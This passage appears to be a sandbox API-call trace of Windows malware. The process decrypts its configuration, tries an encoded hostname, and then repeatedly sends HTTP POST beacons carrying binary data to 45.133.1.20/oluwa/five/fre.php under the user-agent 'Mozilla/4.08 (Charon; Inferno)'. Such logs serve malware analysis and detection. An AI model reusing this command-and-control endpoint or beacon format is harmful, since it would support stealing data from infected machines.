0x6a0000 [0241.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0241.547] recv (in: s=0x7b4, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0241.632] GetProcessHeap () returned 0x6a0000 [0241.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0241.632] GetProcessHeap () returned 0x6a0000 [0241.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0241.633] GetProcessHeap () returned 0x6a0000 [0241.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db8d0 | out: hHeap=0x6a0000) returned 1 [0241.633] GetProcessHeap () returned 0x6a0000 [0241.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0241.635] closesocket (s=0x7b4) returned 0 [0241.636] GetProcessHeap () returned 0x6a0000 [0241.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0241.636] GetProcessHeap () returned 0x6a0000 [0241.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0241.636] GetProcessHeap () returned 0x6a0000 [0241.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0241.636] GetProcessHeap () returned 0x6a0000 [0241.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0241.637] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14e8) returned 0x7b4 [0241.638] Sleep (dwMilliseconds=0xea60) [0241.640] GetProcessHeap () returned 0x6a0000 [0241.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0241.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.641] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0241.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.652] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0241.661] GetProcessHeap () returned 0x6a0000 [0241.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6728 [0241.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.662] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b6728, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0241.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.663] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0241.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.664] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.664] GetProcessHeap () returned 0x6a0000 [0241.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6728 | out: hHeap=0x6a0000) returned 1 [0241.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.667] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0241.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.669] CryptDestroyKey (hKey=0x6ad060) returned 1 [0241.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.672] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0241.672] GetProcessHeap () returned 0x6a0000 [0241.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0241.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.680] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0241.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.681] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0241.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.682] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0241.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.683] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0241.683] GetProcessHeap () returned 0x6a0000 [0241.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0241.683] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0241.683] GetProcessHeap () returned 0x6a0000 [0241.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0241.684] GetProcessHeap () returned 0x6a0000 [0241.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0241.684] GetProcessHeap () returned 0x6a0000 [0241.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0241.685] GetProcessHeap () returned 0x6a0000 [0241.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0241.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.686] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0241.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.694] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0241.701] GetProcessHeap () returned 0x6a0000 [0241.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0241.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.702] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0241.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.703] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0241.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.704] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.704] GetProcessHeap () returned 0x6a0000 [0241.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0241.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.705] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0241.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.706] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0241.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.707] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0241.707] GetProcessHeap () returned 0x6a0000 [0241.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0241.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.807] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0241.808] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.812] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0241.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.813] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0241.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.813] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0241.813] GetProcessHeap () returned 0x6a0000 [0241.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0241.814] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0241.814] GetProcessHeap () returned 0x6a0000 [0241.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0241.814] socket (af=2, type=1, protocol=6) returned 0x7b8 [0241.817] connect (s=0x7b8, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0241.845] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0241.845] GetProcessHeap () returned 0x6a0000 [0241.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0241.845] GetProcessHeap () returned 0x6a0000 [0241.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0241.846] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0241.846] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0241.846] GetProcessHeap () returned 0x6a0000 [0241.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c50f8 [0241.846] GetProcessHeap () returned 0x6a0000 [0241.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0241.847] GetProcessHeap () returned 0x6a0000 [0241.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0241.847] GetProcessHeap () returned 0x6a0000 [0241.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0241.848] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0241.849] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0241.849] GetProcessHeap () returned 0x6a0000 [0241.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0241.849] GetProcessHeap () returned 0x6a0000 [0241.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0241.850] send (s=0x7b8, buf=0x6bd460*, len=242, flags=0) returned 242 [0241.851] send (s=0x7b8, buf=0x6bb998*, len=159, flags=0) returned 159 [0241.851] GetProcessHeap () returned 0x6a0000 [0241.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6db728 [0241.851] recv (in: s=0x7b8, buf=0x6db728, len=4048, flags=0 | out: buf=0x6db728*) returned 204 [0241.943] GetProcessHeap () returned 0x6a0000 [0241.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0241.944] GetProcessHeap () returned 0x6a0000 [0241.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0241.945] GetProcessHeap () returned 0x6a0000 [0241.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c50f8 | out: hHeap=0x6a0000) returned 1 [0241.945] GetProcessHeap () returned 0x6a0000 [0241.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0241.946] closesocket (s=0x7b8) returned 0 [0241.946] GetProcessHeap () returned 0x6a0000 [0241.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0241.946] GetProcessHeap () returned 0x6a0000 [0241.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0241.947] GetProcessHeap () returned 0x6a0000 [0241.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0241.947] GetProcessHeap () returned 0x6a0000 [0241.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0241.948] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6db728, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14ec) returned 0x7b8 [0241.964] Sleep (dwMilliseconds=0xea60) [0241.965] GetProcessHeap () returned 0x6a0000 [0241.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0241.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.967] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.011] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0242.022] GetProcessHeap () returned 0x6a0000 [0242.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0242.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.024] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0242.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.025] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.027] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.027] GetProcessHeap () returned 0x6a0000 [0242.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0242.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.029] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0242.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.030] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0242.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.032] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0242.032] GetProcessHeap () returned 0x6a0000 [0242.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0242.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.033] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0242.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.034] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0242.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.036] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0242.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.037] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0242.037] GetProcessHeap () returned 0x6a0000 [0242.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0242.037] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0242.040] GetProcessHeap () returned 0x6a0000 [0242.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0242.041] GetProcessHeap () returned 0x6a0000 [0242.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0242.042] GetProcessHeap () returned 0x6a0000 [0242.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0242.042] GetProcessHeap () returned 0x6a0000 [0242.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0242.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.043] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.053] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0242.064] GetProcessHeap () returned 0x6a0000 [0242.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0242.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.065] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0242.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.066] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.068] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.068] GetProcessHeap () returned 0x6a0000 [0242.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0242.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.070] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0242.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.072] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0242.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.073] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0242.073] GetProcessHeap () returned 0x6a0000 [0242.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0242.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.074] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0242.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.076] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0242.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.077] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0242.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.078] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0242.078] GetProcessHeap () returned 0x6a0000 [0242.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0242.078] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0242.078] GetProcessHeap () returned 0x6a0000 [0242.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0242.079] socket (af=2, type=1, protocol=6) returned 0x7bc [0242.079] connect (s=0x7bc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0242.105] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0242.105] GetProcessHeap () returned 0x6a0000 [0242.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0242.105] GetProcessHeap () returned 0x6a0000 [0242.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0242.106] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0242.107] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0242.107] GetProcessHeap () returned 0x6a0000 [0242.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4eb8 [0242.107] GetProcessHeap () returned 0x6a0000 [0242.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0242.108] GetProcessHeap () returned 0x6a0000 [0242.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0242.108] GetProcessHeap () returned 0x6a0000 [0242.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0242.109] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0242.109] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0242.109] GetProcessHeap () returned 0x6a0000 [0242.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0242.110] GetProcessHeap () returned 0x6a0000 [0242.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0242.110] send (s=0x7bc, buf=0x6bd460*, len=242, flags=0) returned 242 [0242.111] send (s=0x7bc, buf=0x6bb998*, len=159, flags=0) returned 159 [0242.111] GetProcessHeap () returned 0x6a0000 [0242.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6db728 [0242.111] recv (in: s=0x7bc, buf=0x6db728, len=4048, flags=0 | out: buf=0x6db728*) returned 204 [0242.196] GetProcessHeap () returned 0x6a0000 [0242.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0242.197] GetProcessHeap () returned 0x6a0000 [0242.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0242.198] GetProcessHeap () returned 0x6a0000 [0242.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4eb8 | out: hHeap=0x6a0000) returned 1 [0242.199] GetProcessHeap () returned 0x6a0000 [0242.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0242.199] closesocket (s=0x7bc) returned 0 